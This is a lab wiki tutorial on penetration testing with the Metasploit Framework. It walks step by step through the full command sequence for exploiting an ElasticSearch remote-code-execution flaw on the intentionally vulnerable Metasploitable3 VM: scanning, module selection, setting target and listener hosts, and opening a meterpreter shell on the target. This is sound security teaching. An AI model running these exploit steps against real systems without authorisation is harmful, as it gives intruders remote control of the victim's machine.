Metasploit Framework MSF

From Embedded Lab Vienna for IoT & Security
Jump to: navigation, search

Summary

Metasploit Framework MSF is a tool to detect security vulnerabilities in a IT network infrastructure, it is called Penetration Testing. Penetration Testing is often referred to as "Ethical Hacking". The aim of the penetration tester is to analyse a specific target or a whole network domain.This tool is providing a Application Programming Interface API for security developers to modify or create new vulnerability modules within the framework.

A penetration test is occuring in several stages to get the best pentest results. Firstly, it is necessary to specify the requirements together with your customer. That means, to define the devies at the target domain you would like to attack. After this stage, it is necessary to perform Information or Intelligence Gathering to get enough important details from the target to detect an unprotected breach. When one or more breaches are detected, the penetration tester is spying out how to gain access to the systems. Finally, the exploit of the systems can be performed, if the method of gaining access to it is determined. If the access is gained, Post-Exploitation is necessary to gather important data in the critical network domain.

Requirements

  • Operating system: Linux, f.e. Kali Linux or Ubuntu 18.04
  • Packages: msfconsole postgresql git nmap virtualbox

In order to complete these steps, you must have followed Metasploit Framework, Metasploitable3, PostgreSQL or MySQL Installation Documentation before.

Description of exploit

This is a short Step by Step guidance to run an exploit against a Windows Server 2008 in a virtual machine. Therefore we chose the Application ElasticSearch prior to Version 1.2.0, which is already installed in the Metasploitable3 virtual machine from Rapid7.

The module multi/elasticsearch/script_mvel_rce exploits a Remote Command Execution (RCE) vulnerability in ElasticSearch. The REST API allows dynamic scripts execution without authentication. The remote attacker is able to execute arbitrary Java Code on the target system.

Step 1: open msf tool

Enter the command in the shell to open the terminal of the framework:

msfconsole

Msfconsole.png

Step 2: nmap scan

Enter the command in the shell to detect the open ports of your virtual machine:

db_nmap -Pn 172.28.128.3

DbNmap.png

This command will save the scan directly to the database, you have configured. Enter the command in the shell to check the save results:

services

Services.png

Step 3: search module

Enter the command in the shell to search for a exploit module, named elastic:

search elastic

ExploitSearchElastic.png

Step 4: use module

Enter the command in the shell to use a exploit module:

use exploit/multi/elasticsearch/script_mvel_rce

ExploitElasticUse.png

Enter the command in the shell to check the usage of the module:

info

ExploitElasticInfo.png

Step 5: show module options

Enter the command in the shell to show the module options:

show options

ExploitElasticOptions.png

Step 6: set module options

Enter the command in the shell to set the options:

set rhosts 172.28.128.3
set verbose true
set lhost 172.28.128.1
set rport 9200

ExploitElasticSet.png

Check your settings again with command:

show options

ExploitElasticOptions2.png

Step 7: vulnerability and exploit

Enter the command in the shell to check the vulnerability of the system:

check

ExploitElasticCheck.png

Enter the command in the shell to exploit:

run

ExploitElasticRun.png

The connection to the meterpreter should be opened to perform post-exploitation. If this is not working, maybe check your firewall configurations.

Step 8: meterpreter shell

Enter the command in the shell to open the Command Line Interface CLI of the target host:

shell

MeterpreterShell.png

Enter the command in the shell to check the placement of the xxx.jar file:

DIR /s C:\WINDOWS\TEMP\xxx.jar

MeterpreterShellJar.png

Used Hardware

Hardware.png

References